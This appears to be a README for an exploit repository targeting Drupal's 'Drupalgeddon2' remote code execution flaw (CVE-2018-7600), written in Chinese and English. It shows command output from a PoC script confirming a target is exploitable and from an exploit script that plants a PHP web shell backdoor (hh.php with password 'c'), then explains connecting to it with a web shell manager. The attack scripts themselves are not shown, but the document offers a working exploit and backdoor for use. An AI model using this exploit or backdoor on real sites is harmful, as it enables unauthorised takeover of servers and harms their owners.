CVE-2018-7600 漏洞验证和利用# CVE-2018-7600
CVE-2018-7600 漏洞验证和利用 Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
```
PS D:\CVE-2018-7600> python .\PoC.py
Input target URL (example: http://example.com/): http://192.168.4.5:8080/
Exploitable!
Check: http://192.168.4.5:8080/hh.txt
```
```
PS D:\CVE-2018-7600> python .\Exp.py
Input target URL (example: http://example.com/): http://192.168.4.5:8080/
The attack was successful!
Check backdoor: http://192.168.4.5:8080/hh.php
Backdoor key: c
```
exp利用成功后,会生成后门文件hh.php,可利用WebShell管理工具(如:蚁剑)进行后门连接,类型为php,密码是c
[4.0K] /data/pocs/0104e81e1dc1c7027891b1269c6a6905fafe0114
├── [1.2K] Exp.py
├── [ 784] PoC.py
└── [ 651] README.md
0 directories, 3 files